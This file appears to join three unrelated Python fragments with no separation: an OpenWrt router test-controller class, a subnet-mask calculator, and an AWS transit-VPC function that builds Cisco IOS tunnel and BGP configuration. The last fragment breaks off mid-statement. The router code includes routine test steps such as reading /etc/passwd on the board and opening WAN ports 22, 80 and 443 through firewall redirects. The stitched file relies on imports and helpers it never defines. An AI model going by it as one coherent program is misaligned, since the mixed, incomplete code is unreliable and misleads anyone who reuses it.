class OpenWrtRouter(linux.LinuxDevice):
    '''Console-driven controller for an OpenWrt-based router.

    Drives the board over a serial/ssh console (pexpect-style API inherited
    from LinuxDevice) and a remote power unit, and can move files to/from the
    board via TFTP or the board's own webserver.

    Args:
        model: Examples include "ap148" and "ap135".
        conn_cmd: Command to connect to device such as
                  "ssh -p 3003 [email protected]"
        power_ip: IP Address of power unit to which this device is connected
        power_outlet: Outlet # this device is connected
    '''
    conn_list = None
    consoles = []
    # Shell prompts (regexes) seen on a booted board.
    prompt = ['root\\@.*:.*#', '/ # ', '@R7500:/# ']
    # U-Boot prompts (regexes) for the supported bootloaders.
    uprompt = ['ath>', r'\(IPQ\) #', 'ar7240>', r'\(IPQ40xx\)']
    uboot_eth = "eth0"
    linux_booted = False
    saveenv_safe = True
    lan_gmac_iface = "eth1"
    lan_iface = "br-lan"
    wan_iface = "eth0"
    tftp_server_int = None
    flash_meta_booted = False
    has_cmts = False
    cdrouter_config = None
    # Seconds to wait after setting ethact before running dhcp in U-Boot.
    uboot_net_delay = 30
    routing = True
    lan_network = ipaddress.IPv4Network(u"192.168.1.0/24")
    lan_gateway = ipaddress.IPv4Address(u"192.168.1.1")
    tmpdir = "/tmp"

    def __init__(self,
                 model,
                 conn_cmd,
                 power_ip,
                 power_outlet,
                 output=sys.stdout,
                 password='******',
                 web_proxy=None,
                 tftp_server=None,
                 tftp_username=None,
                 tftp_password=None,
                 tftp_port=None,
                 connection_type=None,
                 power_username=None,
                 power_password=None,
                 config=None,
                 **kwargs):
        self.config = config
        self.consoles = [self]

        # A list of connection commands means "use the first, keep the rest".
        if isinstance(conn_cmd, list):
            self.conn_list = conn_cmd
            conn_cmd = self.conn_list[0]

        if connection_type is None:
            print("\nWARNING: Unknown connection type using ser2net\n")
            connection_type = "ser2net"

        self.connection = connection_decider.connection(connection_type,
                                                        device=self,
                                                        conn_cmd=conn_cmd,
                                                        **kwargs)
        self.connection.connect()
        self.logfile_read = output

        self.power = power.get_power_device(power_ip,
                                            outlet=power_outlet,
                                            username=power_username,
                                            password=power_password)
        self.model = model
        self.web_proxy = web_proxy
        if tftp_server:
            try:
                self.tftp_server = socket.gethostbyname(tftp_server)
                if tftp_username:
                    self.tftp_username = tftp_username
                if tftp_password:
                    self.tftp_password = tftp_password
                if tftp_port:
                    self.tftp_port = tftp_port
            except Exception:
                # Best effort: an unresolvable tftp_server name is ignored.
                # NOTE(review): self.tftp_server is left unset in that case —
                # later tftp use would raise AttributeError; confirm intent.
                pass
        else:
            self.tftp_server = None
        atexit.register(self.kill_console_at_exit)

    def get_file(self, fname, lan_ip=lan_gateway):
        '''
        OpenWrt routers have a webserver, so we use that to download
        the file via a webproxy (e.g. a device on the board's LAN).

        Returns the open HTTP response object for the file.
        '''
        if not self.web_proxy:
            raise Exception('No web proxy defined to access board.')
        url = 'http://%s/TEMP' % lan_ip
        # Make the file world-readable and expose it under the webroot.
        self.sendline("\nchmod a+r %s" % fname)
        self.expect('chmod ')
        self.expect(self.prompt)
        self.sendline("ln -sf %s /www/TEMP" % fname)
        self.expect(self.prompt)
        proxy = ProxyHandler({'http': self.web_proxy + ':8080'})
        opener = build_opener(proxy)
        install_opener(opener)
        print("\nAttempting download of %s via proxy %s" %
              (url, self.web_proxy + ':8080'))
        return urlopen(url, timeout=30)

    def tftp_get_file(self, host, filename, timeout=30):
        '''Download file from tftp server. Returns the local basename.'''
        self.sendline("tftp-hpa %s" % host)
        self.expect("tftp>")
        self.sendline("get %s" % filename)
        t = timeout
        self.expect("tftp>", timeout=t)
        self.sendline("q")
        self.expect(self.prompt)
        # Verify the file actually landed on the board.
        self.sendline("ls `basename %s`" % filename)
        new_fname = os.path.basename(filename)
        self.expect("%s" % new_fname)
        self.expect(self.prompt)
        return new_fname

    def tftp_get_file_uboot(self, loadaddr, filename, timeout=60):
        '''Within u-boot, download file from tftp server.

        Returns the number of bytes transferred; raises if three
        attempts all fail.
        '''
        for _ in range(3):
            try:
                # Probe the bootloader's command set to pick the right verb.
                self.sendline('help')
                self.expect_exact('help')
                self.expect(self.uprompt)
                if 'tftpboot' in self.before:
                    cmd = 'tftpboot'
                else:
                    cmd = 'tftp'
                self.sendline("%s %s %s" % (cmd, loadaddr, filename))
                self.expect_exact("%s %s %s" % (cmd, loadaddr, filename))
                i = self.expect([r'Bytes transferred = (\d+) (.* hex)'] +
                                self.uprompt,
                                timeout=timeout)
                if i != 0:
                    continue
                ret = int(self.match.group(1))
                self.expect(self.uprompt)
                return ret
            except Exception:
                print("\nTFTP failed, let us try that again")
                self.sendcontrol('c')
                self.expect(self.uprompt)
        raise Exception("TFTP failed, try rebooting the board.")

    def prepare_file(self,
                     fname,
                     tserver=None,
                     tusername=None,
                     tpassword=None,
                     tport=None):
        '''Copy file to tftp server, so that it it available to tftp
        to the board itself. Returns the path usable for tftp get.'''
        if tserver is None:
            tserver = self.tftp_server
        if tusername is None:
            tusername = self.tftp_username
        if tpassword is None:
            tpassword = self.tftp_password
        if tport is None:
            tport = self.tftp_port

        if fname.startswith("http://") or fname.startswith("https://"):
            return common.download_from_web(fname, tserver, tusername,
                                            tpassword, tport)
        else:
            return common.scp_to_tftp_server(os.path.abspath(fname), tserver,
                                             tusername, tpassword, tport)

    def install_package(self, fname):
        '''Install OpenWrt package (opkg).'''
        target_file = fname.replace('\\', '/').split('/')[-1]
        new_fname = self.prepare_file(fname)
        local_file = self.tftp_get_file(self.tftp_server,
                                        new_fname,
                                        timeout=60)
        # opkg requires a correct file name
        self.sendline("mv %s %s" % (local_file, target_file))
        self.expect(self.prompt)
        self.sendline("opkg install --force-downgrade %s" % target_file)
        self.expect(['Installing', 'Upgrading', 'Downgrading'])
        self.expect(self.prompt, timeout=60)
        self.sendline("rm -f /%s" % target_file)
        self.expect(self.prompt)

    def wait_for_boot(self):
        '''
        Break into U-Boot. Check memory locations and sizes, and set
        variables needed for flashing.
        '''
        # Try to break into uboot
        for _ in range(4):
            try:
                self.expect('U-Boot', timeout=30)
                i = self.expect(['Hit any key ', 'gpio 17 value 1'] +
                                self.uprompt)
                if i == 1:
                    print(
                        "\n\nWARN: possibly need to hold down reset button to break into U-Boot\n\n"
                    )
                    self.expect('Hit any key ')
                self.sendline('\n\n\n\n\n\n\n')  # try really hard
                i = self.expect(['httpd'] + self.uprompt, timeout=4)
                if i == 0:
                    # Board started its failsafe web server; interrupt it.
                    self.sendcontrol('c')
                # Confirm we really have an interactive prompt.
                self.sendline('echo FOO')
                self.expect('echo FOO')
                self.expect('FOO')
                self.expect(self.uprompt, timeout=4)
                break
            except Exception:
                print('\n\nFailed to break into uboot, try again.')
                self.reset()
        else:
            # Tried too many times without success
            print('\nUnable to break into U-Boot, test will likely fail')
        self.check_memory_addresses()
        # save env first, so CRC is OK for later tests
        self.sendline("saveenv")
        self.expect([
            "Writing to Nand... done", "Protected 1 sectors",
            "Saving Environment to NAND...", 'Saving Environment to FAT...'
        ])
        self.expect(self.uprompt)

    def network_restart(self):
        '''Restart networking.'''
        self.sendline('\nifconfig')
        self.expect('HWaddr', timeout=10)
        self.expect(self.prompt)
        self.sendline('/etc/init.d/network restart')
        self.expect(self.prompt, timeout=40)
        self.sendline('ifconfig')
        self.expect(self.prompt)
        self.wait_for_network()

    def firewall_restart(self):
        '''Restart the firewall. Return how long it took (seconds).'''
        start = datetime.now()
        self.sendline('/etc/init.d/firewall restart')
        self.expect_exact([
            "Loading redirects",
            "* Running script '/usr/share/miniupnpd/firewall.include'",
            "Running script '/etc/firewall.user'"
        ])
        if 'StreamBoost' in self.before:
            print("test_msg: Sleeping for Streamboost")
            self.expect(pexpect.TIMEOUT, timeout=45)
        else:
            self.expect(pexpect.TIMEOUT, timeout=15)
        self.expect(self.prompt, timeout=80)
        return int((datetime.now() - start).seconds)

    def get_wan_iface(self):
        '''Return name of WAN interface.'''
        self.sendline('\nuci show network.wan.ifname')
        self.expect(r"wan.ifname='?([a-zA-Z0-9\.-]*)'?\r\n", timeout=5)
        return self.match.group(1)

    def get_wan_proto(self):
        '''Return protocol of WAN interface, e.g. dhcp.'''
        self.sendline('\nuci show network.wan.proto')
        self.expect(r"wan.proto='?([a-zA-Z0-9\.-]*)'?\r\n", timeout=5)
        return self.match.group(1)

    def setup_uboot_network(self, tftp_server=None):
        '''Within U-boot, request IP Address, set server IP,
        and other networking tasks.'''
        if self.tftp_server_int is None:
            if tftp_server is None:
                raise Exception("Error in TFTP server configuration")
            self.tftp_server_int = tftp_server
        # Use standard eth1 address of wan-side computer
        self.sendline('setenv autoload no')
        self.expect(self.uprompt)
        self.sendline('setenv ethact %s' % self.uboot_eth)
        self.expect(self.uprompt)
        self.expect(
            pexpect.TIMEOUT,
            timeout=self.uboot_net_delay)  # running dhcp too soon causes hang
        self.sendline('dhcp')
        i = self.expect(['Unknown command', 'DHCP client bound to address'],
                        timeout=60)
        self.expect(self.uprompt)
        if i == 0:
            # No DHCP client in this U-Boot; fall back to a static address.
            self.sendline('setenv ipaddr 192.168.0.2')
            self.expect(self.uprompt)
        self.sendline('setenv serverip %s' % self.tftp_server_int)
        self.expect(self.uprompt)
        if self.tftp_server_int:
            passed = False
            for _ in range(5):
                try:
                    self.sendcontrol('c')
                    self.expect('<INTERRUPT>')
                    self.expect(self.uprompt)
                    self.sendline("ping $serverip")
                    self.expect("host %s is alive" % self.tftp_server_int)
                    self.expect(self.uprompt)
                    passed = True
                    break
                except Exception:
                    print("ping failed, trying again")
                    # Try other interface
                    self.sendcontrol('c')
                    self.expect('<INTERRUPT>')
                    self.expect(self.uprompt)
                    self.sendline('dhcp')
                    self.expect('DHCP client bound to address', timeout=60)
                    self.expect(self.uprompt)
                    self.expect(pexpect.TIMEOUT, timeout=1)
            assert passed
        self.sendline('setenv dumpdir crashdump')
        if self.saveenv_safe:
            self.expect(self.uprompt)
            self.sendline('saveenv')
        self.expect(self.uprompt)

    def config_wan_proto(self, proto):
        '''Set protocol for WAN interface ("dhcp" or "pppoe").'''
        if "dhcp" in proto:
            if self.get_wan_proto() != "dhcp":
                self.sendline("uci set network.wan.proto=dhcp")
                self.sendline("uci commit")
                self.expect(self.prompt)
                self.network_restart()
                self.expect(pexpect.TIMEOUT, timeout=10)
        if "pppoe" in proto:
            self.wan_iface = "pppoe-wan"
            if self.get_wan_proto() != "pppoe":
                self.sendline("uci set network.wan.proto=pppoe")
                self.sendline("uci commit")
                self.expect(self.prompt)
                self.network_restart()
                self.expect(pexpect.TIMEOUT, timeout=10)

    def enable_mgmt_gui(self):
        '''Allow access to webgui from devices on WAN interface.'''
        self.uci_allow_wan_http(self.lan_gateway)

    def enable_ssh(self):
        '''Allow ssh on wan interface.'''
        self.uci_allow_wan_ssh(self.lan_gateway)

    def uci_allow_wan_http(self, lan_ip="192.168.1.1"):
        '''Allow access to webgui from devices on WAN interface.'''
        self.uci_forward_traffic_redirect("tcp", "80", lan_ip)

    def uci_allow_wan_ssh(self, lan_ip="192.168.1.1"):
        '''Redirect WAN-side ssh (port 22) to the given LAN address.'''
        self.uci_forward_traffic_redirect("tcp", "22", lan_ip)

    def uci_allow_wan_https(self):
        '''Allow access to webgui from devices on WAN interface.'''
        self.uci_forward_traffic_redirect("tcp", "443", "192.168.1.1")

    def uci_forward_traffic_redirect(self, tcp_udp, port_wan, ip_lan):
        '''Add a firewall DNAT redirect wan:port_wan -> ip_lan and apply it.'''
        self.sendline('uci add firewall redirect')
        self.expect(self.prompt)
        self.sendline('uci set firewall.@redirect[-1].src=wan')
        self.expect(self.prompt)
        self.sendline('uci set firewall.@redirect[-1].src_dport=%s' %
                      port_wan)
        self.expect(self.prompt)
        self.sendline('uci set firewall.@redirect[-1].proto=%s' % tcp_udp)
        self.expect(self.prompt)
        self.sendline('uci set firewall.@redirect[-1].dest=lan')
        self.expect(self.prompt)
        self.sendline('uci set firewall.@redirect[-1].dest_ip=%s' % ip_lan)
        self.expect(self.prompt)
        self.sendline('uci commit firewall')
        self.expect(self.prompt)
        self.firewall_restart()

    def uci_forward_traffic_rule(self, tcp_udp, port, ip, target="ACCEPT"):
        '''Add a firewall traffic rule wan -> lan for ip:port and apply it.'''
        self.sendline('uci add firewall rule')
        self.expect(self.prompt)
        self.sendline('uci set firewall.@rule[-1].src=wan')
        self.expect(self.prompt)
        self.sendline('uci set firewall.@rule[-1].proto=%s' % tcp_udp)
        self.expect(self.prompt)
        self.sendline('uci set firewall.@rule[-1].dest=lan')
        self.expect(self.prompt)
        self.sendline('uci set firewall.@rule[-1].dest_ip=%s' % ip)
        self.expect(self.prompt)
        self.sendline('uci set firewall.@rule[-1].dest_port=%s' % port)
        self.expect(self.prompt)
        self.sendline('uci set firewall.@rule[-1].target=%s' % target)
        self.expect(self.prompt)
        self.sendline('uci commit firewall')
        self.expect(self.prompt)
        self.firewall_restart()

    def wait_for_mounts(self):
        '''wait for overlay to finish mounting'''
        # FIX: original called a global `board` here instead of `self`.
        for _ in range(5):
            try:
                self.sendline('mount')
                self.expect_exact('overlayfs:/overlay on / type overlay',
                                  timeout=15)
                self.expect(self.prompt)
                break
            except Exception:
                pass
        else:
            print("WARN: Overlay still not mounted")

    def get_dns_server(self):
        '''Getting dns server ip address.'''
        return "%s" % self.lan_gateway

    def get_user_id(self, user_id):
        '''Return True if user_id exists in /etc/passwd on the board.'''
        self.sendline('cat /etc/passwd | grep -w ' + user_id)
        idx = self.expect([user_id] + self.prompt)
        if idx == 0:
            self.expect(self.prompt)
        return 0 == idx

    def get_pp_dev(self):
        '''Return the device used for packet-processing stats (self here).'''
        return self

    def collect_stats(self, stats=None):
        '''Start collecting the requested stats (currently only mpstat).

        Args:
            stats: list of stat names to start; recorded in self.stats.
        '''
        # FIX: original used a mutable default argument (stats=[]).
        if stats is None:
            stats = []
        pp = self.get_pp_dev()
        self.stats = []
        self.failed_stats = {}
        for stat in stats:
            if 'mpstat' in stat:
                # Kill any stale mpstat before starting a fresh one.
                for i in range(5):
                    try:
                        pp.sendcontrol('c')
                        pp.sendline(
                            "kill `ps | grep mpstat | grep -v grep | awk '{print $1}'`"
                        )
                        pp.expect_exact(
                            "kill `ps | grep mpstat | grep -v grep | awk '{print $1}'`"
                        )
                        pp.expect(pp.prompt)
                        break
                    except Exception:
                        pp.sendcontrol('d')
                        pp = self.get_pp_dev()
                        if i == 4:
                            print_bold("FAILED TO KILL MPSTAT!")
                            pp.sendcontrol('c')
                pp.sendline('mpstat -P ALL 5 > %s/mpstat &' % self.tmpdir)
                if 0 == pp.expect(['mpstat: not found'] + pp.prompt):
                    self.failed_stats['mpstat'] = float('nan')
                    continue
                elif 0 == pp.expect(['mpstat: not found', pexpect.TIMEOUT],
                                    timeout=4):
                    self.failed_stats['mpstat'] = float('nan')
                    continue
                pp.sendline('ps | grep mpstat')
            self.stats.append(stat)

    def parse_stats(self, dict_to_log=None):
        '''Stop collection and fold results into dict_to_log.

        Args:
            dict_to_log: dict updated in place with parsed stat values
                         (and any failed stats recorded as NaN).
        '''
        # FIX: original used a mutable default argument (dict_to_log={}),
        # which was mutated by dict_to_log.update() across calls.
        if dict_to_log is None:
            dict_to_log = {}
        pp = self.get_pp_dev()
        if 'mpstat' in self.stats:
            # Confirm mpstat is actually still running before parsing.
            pp.sendline('ps | grep mpstat')
            pp.expect_exact('ps | grep mpstat')
            if 0 == pp.expect([pexpect.TIMEOUT, 'mpstat -P ALL 5'],
                              timeout=5):
                self.failed_stats['mpstat'] = float('nan')
                self.stats.remove('mpstat')
        idx = 0
        for _ in range(len(self.stats)):
            pp.sendline('fg')
            pp.expect(self.stats)
            if 'mpstat' in pp.match.group():
                pp.sendcontrol('c')
                pp.expect(pp.prompt)
                pp.sendline('cat %s/mpstat' % self.tmpdir)
                pp.expect(['cat %s/mpstat' % self.tmpdir, pexpect.TIMEOUT])
                # Average the per-sample "%idle" column (last field of each
                # "all" row); cpu usage = 100 - average idle.
                idle_vals = []
                start = datetime.now()
                while 0 == pp.expect(
                    [r'all(\s+\d+\.\d{2}){9}\r\n', pexpect.TIMEOUT] +
                        pp.prompt):
                    idle_vals.append(
                        float(pp.match.group().strip().split(' ')[-1]))
                    if (datetime.now() - start).seconds > 60:
                        self.touch()
                if len(idle_vals) != 0:
                    avg_cpu_usage = 100 - sum(idle_vals) / len(idle_vals)
                    dict_to_log['mpstat'] = avg_cpu_usage
                else:
                    dict_to_log['mpstat'] = 0
                pp.sendline('rm %s/mpstat' % self.tmpdir)
                pp.expect([pexpect.TIMEOUT] + pp.prompt)
            idx += 1
        # TODO: verify we got 'em all
        if idx != len(self.stats):
            print("WARN: did not match all stats collected!")
        dict_to_log.update(self.failed_stats)
def findSubnetMask(args):
    '''Compute and print subnet details for args.ip, optionally subnetted.

    Args:
        args: namespace with .ip (dotted IP, optionally with "/prefix")
              and .s (requested number of subnets, or None).

    Delegates the actual printing to printDetail(); returns None on
    invalid input.
    '''
    parts = str(args.ip).split('/')
    ip = parts[0].split('.')
    ip = [int(x) for x in ip]
    netId = [0, 0, 0, 0]
    # Remember whether the caller explicitly asked for subnetting
    # before defaulting the count to 1.
    subnetting = args.s is not None
    n = 0
    if args.s is None:
        args.s = 1
    try:
        # Bits needed to address args.s subnets.
        n = math.ceil(math.log2(args.s))
    except ValueError:
        print('\nNo. of Subnets cannot be 0')
        return
    # NOTE(review): only too-many octets are rejected here; short or
    # out-of-range octets fall through — confirm that is intended.
    if len(ip) > 4:
        print('\nInvalid ip address')
        return
    if '/' in args.ip:
        # CIDR notation given: classless subnetting.
        if args.s > 2**(32 - int(parts[1])):
            print("\nInvalid no. of Subnets")
            return
        print('\nClassless')
        mask = cidrSubnetMask(ip, int(parts[1]) + n)
        mask = '.'.join(str(x) for x in mask)
        ip = '.'.join(str(x) for x in ip)
        ip = ip + '/' + str(parts[1])
        ip = ipaddress.ip_interface(ip)
        netId = ip.network
        # args.s is always set by this point, so subnets are always listed.
        network = list(netId.subnets(n))
        return printDetail(None, ip, netId, mask, network, subnetting)
    else:
        # No prefix given: fall back to classful A/B/C handling.
        print('\nClassfull')
        cl = ""
        if ip[0] in range(1, 128):
            cl = 'A'
            netId[0] = ip[0]
            if args.s < 2**24:
                mask = cidrSubnetMask(ip, n + 8)
                mask = '.'.join(str(x) for x in mask)
                ip = '.'.join(str(x) for x in ip)
                netId = '.'.join(str(x) for x in netId)
                netId = netId + '/' + str(8)
                netId = ipaddress.IPv4Network(netId)
                network = list(netId.subnets(n))
                return printDetail(cl, ip, netId, mask, network, subnetting)
            else:
                print('\nInvalid No. of Subnets')
        elif ip[0] in range(128, 192):
            cl = 'B'
            netId[0] = ip[0]
            netId[1] = ip[1]
            if args.s < 2**16:
                mask = cidrSubnetMask(ip, n + 16)
                mask = '.'.join(str(x) for x in mask)
                ip = '.'.join(str(x) for x in ip)
                netId = '.'.join(str(x) for x in netId)
                netId = netId + '/' + str(16)
                netId = ipaddress.IPv4Network(netId)
                network = list(netId.subnets(n))
                return printDetail(cl, ip, netId, mask, network, subnetting)
            else:
                print('\nInvalid No. of Subnets')
        elif ip[0] in range(192, 224):
            cl = 'C'
            netId[0] = ip[0]
            netId[1] = ip[1]
            netId[2] = ip[2]
            if args.s < 2**8:
                mask = cidrSubnetMask(ip, n + 24)
                mask = '.'.join(str(x) for x in mask)
                ip = '.'.join(str(x) for x in ip)
                netId = '.'.join(str(x) for x in netId)
                netId = netId + '/' + str(24)
                netId = ipaddress.IPv4Network(netId)
                network = list(netId.subnets(n))
                return printDetail(cl, ip, netId, mask, network, subnetting)
            else:
                print('\nInvalid No. of Subnets')
        else:
            print('\nInvalid Format')
def create_cisco_config(bucket_name, bucket_key, s3_url, bgp_asn, ssh):
    '''Build Cisco IOS config lines for an AWS VPN connection.

    Reads the AWS-generated VPN configuration XML from S3
    (bucket_name/bucket_key via s3_url) and turns it into a list of IOS
    CLI lines that either create or delete the VRF, tunnels, BGP and
    crypto configuration for that connection. `ssh` is passed through to
    the tunnel-id helper functions. Returns the list of config lines, or
    None when deleting a connection with no existing tunnel.
    '''
    log.info("Processing %s/%s", bucket_name, bucket_key)

    #Download the VPN configuration XML document
    s3 = boto3.client('s3',
                      endpoint_url=s3_url,
                      config=Config(s3={'addressing_style': 'virtual'},
                                    signature_version='s3v4'))
    config = s3.get_object(Bucket=bucket_name, Key=bucket_key)
    xmldoc = minidom.parseString(config['Body'].read())
    #Extract transit_vpc_configuration values
    vpn_config = xmldoc.getElementsByTagName("transit_vpc_config")[0]
    account_id = vpn_config.getElementsByTagName(
        "account_id")[0].firstChild.data
    vpn_endpoint = vpn_config.getElementsByTagName(
        "vpn_endpoint")[0].firstChild.data
    vpn_status = vpn_config.getElementsByTagName("status")[0].firstChild.data
    preferred_path = vpn_config.getElementsByTagName(
        "preferred_path")[0].firstChild.data

    #Extract VPN connection information
    vpn_connection = xmldoc.getElementsByTagName('vpn_connection')[0]
    vpn_connection_id = vpn_connection.attributes['id'].value
    customer_gateway_id = vpn_connection.getElementsByTagName(
        "customer_gateway_id")[0].firstChild.data
    vpn_gateway_id = vpn_connection.getElementsByTagName(
        "vpn_gateway_id")[0].firstChild.data
    vpn_connection_type = vpn_connection.getElementsByTagName(
        "vpn_connection_type")[0].firstChild.data

    #Determine the VPN tunnels to work with
    # Each connection uses a consecutive pair: tunnelId and tunnelId + 1.
    if vpn_status == 'create':
        tunnelId = getNextTunnelId(ssh)
    else:
        tunnelId = getExistingTunnelId(ssh, vpn_connection_id)
        if tunnelId == 0:
            # Nothing to delete for this connection.
            return

    log.info("%s %s with tunnel #%s and #%s.", vpn_status, vpn_connection_id,
             tunnelId, tunnelId + 1)
    # Create or delete the VRF for this connection
    if vpn_status == 'delete':
        # Only the BGP ASN is needed from the tunnel details when deleting.
        ipsec_tunnel = vpn_connection.getElementsByTagName("ipsec_tunnel")[0]
        customer_gateway = ipsec_tunnel.getElementsByTagName(
            "customer_gateway")[0]
        customer_gateway_bgp_asn = customer_gateway.getElementsByTagName(
            "bgp")[0].getElementsByTagName("asn")[0].firstChild.data
        #Remove VPN configuration for both tunnels
        config_text = ['router bgp {}'.format(customer_gateway_bgp_asn)]
        config_text.append(
            ' no address-family ipv4 vrf {}'.format(vpn_connection_id))
        config_text.append('exit')
        config_text.append('no ip vrf {}'.format(vpn_connection_id))
        config_text.append('interface Tunnel{}'.format(tunnelId))
        config_text.append(' shutdown')
        config_text.append('exit')
        config_text.append('no interface Tunnel{}'.format(tunnelId))
        config_text.append('interface Tunnel{}'.format(tunnelId + 1))
        config_text.append(' shutdown')
        config_text.append('exit')
        config_text.append('no interface Tunnel{}'.format(tunnelId + 1))
        config_text.append(
            'no route-map rm-{} permit'.format(vpn_connection_id))
        # Cisco requires waiting 60 seconds before removing the isakmp profile
        config_text.append('WAIT')
        config_text.append('WAIT')
        config_text.append('no crypto isakmp profile isakmp-{}-{}'.format(
            vpn_connection_id, tunnelId))
        config_text.append('no crypto isakmp profile isakmp-{}-{}'.format(
            vpn_connection_id, tunnelId + 1))
        config_text.append('no crypto keyring keyring-{}-{}'.format(
            vpn_connection_id, tunnelId))
        config_text.append('no crypto keyring keyring-{}-{}'.format(
            vpn_connection_id, tunnelId + 1))
    else:
        # Create global tunnel configuration
        config_text = ['ip vrf {}'.format(vpn_connection_id)]
        config_text.append(' rd {}:{}'.format(bgp_asn, tunnelId))
        config_text.append(' route-target export {}:0'.format(bgp_asn))
        config_text.append(' route-target import {}:0'.format(bgp_asn))
        config_text.append('exit')
        # Check to see if a route map is needed for creating a preferred path
        if preferred_path != 'none':
            config_text.append(
                'route-map rm-{} permit'.format(vpn_connection_id))
            # If the preferred path is this transit VPC vpn endpoint, then set a shorter as-path prepend than if it is not
            if preferred_path == vpn_endpoint:
                config_text.append(' set as-path prepend {}'.format(bgp_asn))
            else:
                config_text.append(' set as-path prepend {} {}'.format(
                    bgp_asn, bgp_asn))
            config_text.append('exit')

        # Create tunnel specific configuration
        for ipsec_tunnel in vpn_connection.getElementsByTagName(
                "ipsec_tunnel"):
            # --- customer gateway (this router's) side of the tunnel ---
            customer_gateway = ipsec_tunnel.getElementsByTagName(
                "customer_gateway")[0]
            customer_gateway_tunnel_outside_address = customer_gateway.getElementsByTagName(
                "tunnel_outside_address")[0].getElementsByTagName(
                    "ip_address")[0].firstChild.data
            customer_gateway_tunnel_inside_address_ip_address = customer_gateway.getElementsByTagName(
                "tunnel_inside_address")[0].getElementsByTagName(
                    "ip_address")[0].firstChild.data
            customer_gateway_tunnel_inside_address_network_mask = customer_gateway.getElementsByTagName(
                "tunnel_inside_address")[0].getElementsByTagName(
                    "network_mask")[0].firstChild.data
            customer_gateway_tunnel_inside_address_network_cidr = customer_gateway.getElementsByTagName(
                "tunnel_inside_address")[0].getElementsByTagName(
                    "network_cidr")[0].firstChild.data
            customer_gateway_bgp_asn = customer_gateway.getElementsByTagName(
                "bgp")[0].getElementsByTagName("asn")[0].firstChild.data
            customer_gateway_bgp_hold_time = customer_gateway.getElementsByTagName(
                "bgp")[0].getElementsByTagName("hold_time")[0].firstChild.data

            # --- AWS VPN gateway side of the tunnel ---
            vpn_gateway = ipsec_tunnel.getElementsByTagName("vpn_gateway")[0]
            vpn_gateway_tunnel_outside_address = vpn_gateway.getElementsByTagName(
                "tunnel_outside_address")[0].getElementsByTagName(
                    "ip_address")[0].firstChild.data
            vpn_gateway_tunnel_inside_address_ip_address = vpn_gateway.getElementsByTagName(
                "tunnel_inside_address")[0].getElementsByTagName(
                    "ip_address")[0].firstChild.data
            vpn_gateway_tunnel_inside_address_network_mask = vpn_gateway.getElementsByTagName(
                "tunnel_inside_address")[0].getElementsByTagName(
                    "network_mask")[0].firstChild.data
            vpn_gateway_tunnel_inside_address_network_cidr = vpn_gateway.getElementsByTagName(
                "tunnel_inside_address")[0].getElementsByTagName(
                    "network_cidr")[0].firstChild.data
            vpn_gateway_bgp_asn = vpn_gateway.getElementsByTagName(
                "bgp")[0].getElementsByTagName("asn")[0].firstChild.data
            vpn_gateway_bgp_hold_time = vpn_gateway.getElementsByTagName(
                "bgp")[0].getElementsByTagName("hold_time")[0].firstChild.data

            # --- IKE parameters (parsed; not all are emitted below) ---
            ike = ipsec_tunnel.getElementsByTagName("ike")[0]
            ike_authentication_protocol = ike.getElementsByTagName(
                "authentication_protocol")[0].firstChild.data
            ike_encryption_protocol = ike.getElementsByTagName(
                "encryption_protocol")[0].firstChild.data
            ike_lifetime = ike.getElementsByTagName(
                "lifetime")[0].firstChild.data
            ike_perfect_forward_secrecy = ike.getElementsByTagName(
                "perfect_forward_secrecy")[0].firstChild.data
            ike_mode = ike.getElementsByTagName("mode")[0].firstChild.data
            ike_pre_shared_key = ike.getElementsByTagName(
                "pre_shared_key")[0].firstChild.data

            # --- IPsec parameters (parsed; not all are emitted below) ---
            ipsec = ipsec_tunnel.getElementsByTagName("ipsec")[0]
            ipsec_protocol = ipsec.getElementsByTagName(
                "protocol")[0].firstChild.data
            ipsec_authentication_protocol = ipsec.getElementsByTagName(
                "authentication_protocol")[0].firstChild.data
            ipsec_encryption_protocol = ipsec.getElementsByTagName(
                "encryption_protocol")[0].firstChild.data
            ipsec_lifetime = ipsec.getElementsByTagName(
                "lifetime")[0].firstChild.data
            ipsec_perfect_forward_secrecy = ipsec.getElementsByTagName(
                "perfect_forward_secrecy")[0].firstChild.data
            ipsec_mode = ipsec.getElementsByTagName("mode")[0].firstChild.data
            ipsec_clear_df_bit = ipsec.getElementsByTagName(
                "clear_df_bit")[0].firstChild.data
            ipsec_fragmentation_before_encryption = ipsec.getElementsByTagName(
                "fragmentation_before_encryption")[0].firstChild.data
            ipsec_tcp_mss_adjustment = ipsec.getElementsByTagName(
                "tcp_mss_adjustment")[0].firstChild.data
            ipsec_dead_peer_detection_interval = ipsec.getElementsByTagName(
                "dead_peer_detection")[0].getElementsByTagName(
                    "interval")[0].firstChild.data
            ipsec_dead_peer_detection_retries = ipsec.getElementsByTagName(
                "dead_peer_detection")[0].getElementsByTagName(
                    "retries")[0].firstChild.data

            # Crypto keyring + isakmp profile keyed by connection and tunnel.
            config_text.append('crypto keyring keyring-{}-{}'.format(
                vpn_connection_id, tunnelId))
            config_text.append(' local-address GigabitEthernet1')
            config_text.append(' pre-shared-key address {} key {}'.format(
                vpn_gateway_tunnel_outside_address, ike_pre_shared_key))
            config_text.append('exit')
            config_text.append('crypto isakmp profile isakmp-{}-{}'.format(
                vpn_connection_id, tunnelId))
            config_text.append(' local-address GigabitEthernet1')
            config_text.append(' match identity address {}'.format(
                vpn_gateway_tunnel_outside_address))
            config_text.append(' keyring keyring-{}-{}'.format(
                vpn_connection_id, tunnelId))
            config_text.append('exit')
            # Tunnel interface bound to the connection's VRF.
            config_text.append('interface Tunnel{}'.format(tunnelId))
            config_text.append(
                ' description {} from {} to {} for account {}'.format(
                    vpn_connection_id, vpn_gateway_id, customer_gateway_id,
                    account_id))
            config_text.append(
                ' ip vrf forwarding {}'.format(vpn_connection_id))
            config_text.append(' ip address {} 255.255.255.252'.format(
                customer_gateway_tunnel_inside_address_ip_address))
            config_text.append(' ip virtual-reassembly')
            config_text.append(' tunnel source GigabitEthernet1')
            config_text.append(' tunnel destination {} '.format(
                vpn_gateway_tunnel_outside_address))
            config_text.append(' tunnel mode ipsec ipv4')
            config_text.append(
                ' tunnel protection ipsec profile ipsec-vpn-aws')
            config_text.append(' ip tcp adjust-mss 1387')
            config_text.append(' no shutdown')
            config_text.append('exit')
            # BGP peering with the AWS side inside the VRF.
            config_text.append(
                'router bgp {}'.format(customer_gateway_bgp_asn))
            config_text.append(
                ' address-family ipv4 vrf {}'.format(vpn_connection_id))
            config_text.append(' neighbor {} remote-as {}'.format(
                vpn_gateway_tunnel_inside_address_ip_address,
                vpn_gateway_bgp_asn))
            if preferred_path != 'none':
